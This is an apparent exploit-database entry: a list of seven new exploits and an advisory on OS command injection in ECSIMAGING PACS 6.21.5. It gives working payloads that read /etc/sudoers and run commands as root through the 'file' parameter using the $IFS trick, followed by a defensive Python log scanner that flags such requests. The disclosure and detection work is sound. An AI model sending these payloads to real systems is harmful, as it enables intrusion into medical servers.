
7 changes to exploits/shellcodes

iBall-Baton WRA150N Rom-0 Backup - File Disclosure (Sensitive Information)
ECSIMAGING PACS 6.21.5 - Remote code execution
Employee Record System 1.0 - Unrestricted File Upload to Remote Code Execution
Cockpit CMS 0.6.1 - Remote Code Execution
Curfew e-Pass Management System 1.0 - Stored XSS
ECSIMAGING PACS 6.21.5 - SQL injection
CRUD Operation 1.0 - Multiple Stored XSS
# Exploit Title: ECSIMAGING PACS 6.21.5 - Remote code execution
# Date: 06/01/2021
# Exploit Author: shoxxdj
# Vendor Homepage: https://www.medicalexpo.fr/
# Version: 6.21.5 and below (tested on 6.21.5, 6.21.3)
# Tested on: Linux

The ECSIMAGING PACS application, version 6.21.5 and below, suffers from an OS command injection vulnerability.
The "file" parameter of the /showfile.php page can be exploited with a simple OS command injection to gain root access.
The www-data user has sudo NOPASSWD access:

/showfile.php?file=/etc/sudoers
[...]
www-data ALL=NOPASSWD: ALL
[...]

Command injection can be achieved with the $IFS trick (the shell expands $IFS to whitespace, so it replaces the spaces between arguments): <url>/showfile.php?file=;ls$IFS-la$IFS/

/showfile.php?file=;sudo$IFS-l
[...]
User www-data may run the following commands on this host:
(root) NOPASSWD: ALL
[...]
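
For defenders, a log check for the two request shapes shown above, as an added example that is not part of the original advisory or the vendor's code. It assumes combined-format access logs and that legitimate "file" values are never absolute paths; the log lines, addresses and the name report_0001.pdf are constructed.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Shell metacharacters plus the $IFS / ${IFS} space substitute used in the requests above.
SHELL_META = re.compile(r"[;|&`<>\n]|\$\(|\$\{?IFS\}?")
# Request field of a combined-format access log line.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def file_values(target):
    """Yield decoded 'file' parameter values from a showfile.php request target."""
    url = urlsplit(target)
    if not url.path.endswith("/showfile.php"):
        return
    # Split on '&' only: ';' must stay inside the value, not act as a separator.
    for field in url.query.split("&"):
        name, _, value = field.partition("=")
        if unquote_plus(name) == "file":
            yield unquote_plus(value)

def classify(log_line):
    """Return 'command-injection', 'path-disclosure' or None for one log line."""
    m = REQUEST.search(log_line)
    if not m:
        return None
    verdict = None
    for value in file_values(m.group(1)):
        if SHELL_META.search(value):
            return "command-injection"
        # Assumption: legitimate values are never absolute paths or traversals.
        if value.startswith("/") or ".." in value.split("/"):
            verdict = "path-disclosure"
    return verdict

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [06/Jan/2021:10:00:01 +0000] "GET /showfile.php?file=report_0001.pdf HTTP/1.1" 200 5120',
    '192.0.2.44 - - [06/Jan/2021:10:02:13 +0000] "GET /showfile.php?file=/etc/sudoers HTTP/1.1" 200 812',
    '192.0.2.44 - - [06/Jan/2021:10:02:40 +0000] "GET /showfile.php?file=;sudo$IFS-l HTTP/1.1" 200 301',
    '192.0.2.44 - - [06/Jan/2021:10:03:02 +0000] "GET /showfile.php?file=%3Bls%24IFS-la%24IFS/ HTTP/1.1" 200 950',
    '192.0.2.10 - - [06/Jan/2021:10:05:00 +0000] "GET /index.php?file=;x HTTP/1.1" 200 100',
]

def scan(lines):
    """Return (line_number, verdict) for every flagged line."""
    return [(n, v) for n, line in enumerate(lines, 1) if (v := classify(line))]

if __name__ == "__main__":
    for n, verdict in scan(SAMPLE_LOG):
        print(n, verdict)
```

Values are percent-decoded before matching, so the encoded form of the same request (fourth sample line) is flagged as well.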